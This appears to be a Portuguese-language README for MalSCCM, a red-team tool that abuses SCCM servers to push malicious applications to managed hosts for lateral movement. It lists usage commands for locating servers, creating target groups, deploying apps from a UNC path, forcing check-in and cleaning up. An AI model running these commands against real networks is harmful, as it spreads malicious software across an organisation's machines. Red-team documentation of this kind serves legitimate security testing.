
Abusar de servidores SCCM para implantar aplicativos maliciosos em hosts gerenciados para movimentação lateral e operações de red team.
Esta ferramenta permite que você abuse de servidores SCCM locais ou remotos para implantar aplicativos maliciosos em hosts que eles gerenciam. Para usar esta ferramenta, seu processo atual deve ter direitos de administrador sobre o servidor SCCM.
Normalmente, as implantações do SCCM terão o servidor de gerenciamento e o servidor primário no mesmo host; nesse caso, o host retornado pelo comando locate pode ser usado como servidor primário.
Se isso não for o caso, você precisará comprometer o host de gerenciamento retornado pelo comando locate para que possa executar locate novamente nesse host e obter o nome do servidor primário. Depois de obtê-lo e ter acesso de administrador, você está pronto para prosseguir!
Para mais informações sobre o uso da ferramenta, consulte o blog abaixo.
Muito crédito ao PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) no qual tudo isso se baseia; isto não teria sido possível sem o trabalho de @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.
Comandos listados abaixo possuem parâmetros opcionais entre < >.
Tentar encontrar os servidores de gerenciamento e primário do SCCM:
MalSCCM.exe locate
Inspecionar o servidor primário para coletar informações do SCCM:
MalSCCM.exe inspect </server:NomeHostSitePrimario> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Criar/Modificar/Excluir grupos para adicionar alvos para implantar aplicativos maliciosos. Grupos podem ser de dispositivos ou usuários:
MalSCCM.exe group /create /groupname:exemplo /grouptype:[user|device] </server:NomeHostSitePrimario>
MalSCCM.exe group /delete /groupname:exemplo </server:NomeHostSitePrimario>
MalSCCM.exe group /addhost /groupname:exemplo /host:hostexemplo </server:NomeHostSitePrimario>
MalSCCM.exe group /adduser /groupname:exemplo /user:usuarioexemplo </server:NomeHostSitePrimario>
Criar/Implantar/Excluir aplicativos maliciosos:
MalSCCM.exe app /create /name:nomeapp /uncpath:""\\unc\caminho"" </server:NomeHostSitePrimario>
MalSCCM.exe app /delete /name:nomeapp </server:NomeHostSitePrimario>
MalSCCM.exe app /deploy /name:nomeapp /groupname:exemplo /assignmentname:exemplo2 </server:NomeHostSitePrimario>
MalSCCM.exe app /deletedeploy /name:nomeapp </server:NomeHostSitePrimario>
MalSCCM.exe app /cleanup /name:nomeapp </server:NomeHostSitePrimario>
Forçar dispositivos de um grupo a fazer check-in em alguns minutos:
MalSCCM.exe checkin /groupname:exemplo </server:NomeHostSitePrimario>